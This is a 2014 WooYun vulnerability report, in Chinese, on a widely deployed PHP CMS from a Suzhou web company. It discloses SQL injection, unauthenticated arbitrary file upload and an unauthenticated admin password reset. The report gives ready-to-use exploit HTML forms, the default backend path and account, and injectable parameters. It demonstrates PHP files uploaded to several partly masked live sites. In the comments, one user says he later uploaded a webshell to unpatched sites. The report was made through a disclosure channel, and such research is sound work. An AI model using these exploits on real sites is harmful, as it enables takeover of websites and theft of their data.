当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(15) 关注此漏洞

缺陷编号: WooYun-2014-62071

漏洞标题: 某建站公司开发的CMS存在通用SQL注射、任意文件上传、管理员密码修改漏洞

相关厂商: 某网络科技有限公司

漏洞作者: U神

提交时间: 2014-05-27 11:27

公开时间: 2014-08-23 11:28

漏洞类型: 文件上传导致任意代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 任意文件上传 SQL注射 任意文件上传 任意密码修改

1人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-27: 细节已通知厂商并且等待厂商处理中
2014-05-30: 厂商已经确认,细节仅向厂商公开
2014-06-02: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-07-24: 细节向核心白帽子及相关领域专家公开
2014-08-03: 细节向普通白帽子公开
2014-08-13: 细节向实习白帽子公开
2014-08-23: 细节向公众公开

简要描述:

@疯狗,这个危害大啊~多个漏洞打包了,求来个首页,今晚请你吃饭!

详细说明:

#1.通用漏洞的详细描述

code 区域
1、建站程序类型:PHP+Mysql


2、漏洞类型:大量SQL注入、任意文件上传、管理员密码修改


3、缺陷文件:


注入:news_show.php 等大量


上传漏洞:admin_topsi/addpic.php?action=upload


管理员密码修改:admin_topsi/modifypwd.php


4、注入参数:id、tid等等


5.涉及版本:全版本


7、危害程度:高危


8、涉及厂商:苏州托普斯网络科技有限公司


9、厂商网站:http://**.**.**.**/


10、安装量:大


11、是否拥有源代码分析:暂无


12、关键字:"技术支持:苏州托普斯网络" 厂商案例:http://**.**.**.**/case.php


13、是否默认配置:是


14、枚举案例【应乌云的要求,枚举5例】:


【声明:以下提供的全部案例一方面证明通用型,一方面是给CNVD或Cncert测试,其他人不得用此作非法用途或者破坏操作,否则后果自负】





http://www.h***o.co/


http://www.c*****.**.**.**


http://www.s*****.**.**.**


http://**.**.**.**


http://hefeng.*****.**.**.**


http://**.**.**.**


.....等等





#2.关键字的搜索量、厂商主页的案例列表:

code 区域
01.jpg




04.jpg





漏洞证明:

#3.SQL注入漏洞的实例证明(乌云要求枚举5枚):

code 区域
http://www.***.com/product_show.php?id=31



05.jpg



http://www.***.com/news_show.php?id=36&tid=2&cid=2



06.jpg



http://www.s*****.**.**.**/news_show.php?id=29



07.jpg



http://www.k*****.**.**.**/new_show.php?id=61



08.jpg



http://www.s***.com/news_show.php?id=48



09.jpg





************************************************************************************************

#4.任意文件上传证明【admin_topsi/addpic.php】:

首先要知道默认后台是:admin_topsi/login.php

默认后台页面样式:

11.jpg





详细说明:后台的文件上传页面【admin_topsi/addpic.php】

虽然限制了访问该页面,但是通过测试,本地构造上传表单直接post到这个地址,NC提交post数据包或者开启抓包工具就可以得到上传的文件。

EXP:

code 区域
<form enctype="multipart/form-data" method="post" action="http://**.**.**.**/admin_topsi/addpic.php?action=upload">


<input name="mypic" type="File" size="35">


<input type="Submit" name="Submit" value="upload">


</form>



然后提交之后抓包,获得上传文件,统一存储在【upload】目录下:

12.jpg



code 区域
http://www.s*****.**.**.**/upload/1400849095.php



13.jpg



继续枚举案例:

14.jpg



code 区域
http://www.k*****.**.**.**/upload/1400849551.php



15.jpg



再继续枚举案例:

16.jpg



code 区域
http://www.c*****.**.**.**/upload/1400849984.php



19.jpg



最后再努力举例一枚:

17.jpg



code 区域
http://www.*****.**.**.**/upload/1400850100.php



18.jpg







************************************************************************************************

#5.管理员密码修改证明【admin_topsi/modifypwd.php】



首先说明一下,这套CMS存在通用帐号:“admintopsi”,跟上面原理一样,直接提交就可以了,虽然会跳转到登录框,但是无视它直接用新密码登录会发现成功登录,下面构造EXP:

code 区域
<html>


<head>


<meta http-equiv="Content-Type" content="text/html; charset=GBK">


<title>ModifyAdminpwd</title>


</head>


<body>


<form method="post" action="http://www.**.**.**.**/admin_topsi/modifypwd.php" name="form1">


     用 户 名:<b>admintopsi</b>


	  <br>


      新 密 码:


      <input name="password" type="password" id="password">


	  <br>


     确认密码:


      <input name="pwdconfirm" type="password" id="pwdconfirm"> 


	  <br>


      <input class="luweiinput" type="submit" name="Submit" value=" 确 定 ">


	  <input class="luweiinput" name="Cancel" type="button" id="Cancel" value=" 取 消 ">


</form>



大神一眼看出这个EXP有问题吧,我也暂时没有分析出用户名是怎么接收的?源码没权限拿到啊~所以这里只能改默认帐号“admintopsi”,但是绝大多存在该默认帐号~



实战测试:

code 区域
http://www.k*****.**.**.**/



根据注入发现这个网站存在默认帐号:admintopsi

然后直接上EXP去修改,修改成功~

20.jpg





再来一例~(仔细看,虽然会跳转到登录框)

code 区域
http://www.s*****.**.**.**



21.jpg



22.jpg



最后再演示一例:

code 区域
http://www.s***b**.**.**.**



23.jpg





PS:有人会说,你这肯定是登录后台留下了缓存或cookie导致可以修改密码的,首先我要这样说,测试这个漏洞的时候我并没有去尝试登录后台,而是先通过注入得到帐号密码,然后将密码解密,这里解密是因为我既然改了别人密码肯定要改回去是吧,不然别人很着急的,所以我先记下原密码,然后我连后台都没登录过,然后通过上面给出的EXP,直接将密码修改成123456或其它密码,结果发现确实是可以登录的,也就是说无需进入后台就可以修改密码。我所奇怪之处就是不知道这个用户名是如何接收的,测试了一下用增加一个input里面的id改为username、name都无效,通过抓包也没分析出来~而且这些网站真奇怪!



修复方案:

PS:希望cncert在测试修改密码这个漏洞的时候先通过注射将原密码注射出来解密后,记住原密码,然后再尝试测试修改密码这个漏洞!以免给他人带来不必要的麻烦,谢谢合作~

【以上均为安全测试,漏洞报告,其他人请勿用于非法用途或破坏,否则后果自负】

版权声明:转载请注明来源 U神@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-05-30 09:49

厂商回复:

CNVD确认并复现所述情况,由CNVD通过公开联系渠道向软件生产厂商通报处置。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-05-25 12:07 | ( 普通白帽子 | Rank:1218 漏洞数:105 | 传闻中魇是一个惊世奇男子, 但是除了他华...)
    1

    三合一啊,今晚可以到警局来吃饭

    1# 回复此人
  2. 2014-05-25 12:31 | U神 ( 核心白帽子 | Rank:1360 漏洞数:93 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    0

    @疯狗 我擦!你这样打出厂商名字来不就谁都知道详情了?

    2# 回复此人
  3. 2014-05-25 12:48 | Azui ( 实习白帽子 | Rank:61 漏洞数:14 | 人有两件宝,双手和大脑。)
    0

    @U神 +1 这样子基本上都知道了。

    3# 回复此人
  4. 2014-05-26 11:27 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    @U神 - - !

    4# 回复此人
  5. 2014-05-26 11:47 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:176 | 力不从心)
    1

    @U神 @疯狗 吃饭了?

    5# 回复此人
  6. 2014-08-24 22:05 | answer 认证白帽子 ( 普通白帽子 | Rank:453 漏洞数:49 | 答案)
    0

    目测 任意上传用不了呢 。。我传了过后 跳出的是404。。。。。X

    6# 回复此人
  7. 2014-08-24 22:57 | U神 ( 核心白帽子 | Rank:1360 漏洞数:93 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    0

    @answer 厂商已经修复了漏洞

    7# 回复此人
  8. 2014-08-24 23:39 | answer 认证白帽子 ( 普通白帽子 | Rank:453 漏洞数:49 | 答案)
    0

    @U神 霍霍 虽然修了 但还是找到有漏网之鱼,,但不知道为什么传上去的马儿访问的时候有错误。。不知道怎么回事 。。

    8# 回复此人

登录后才能发表评论,请先 登录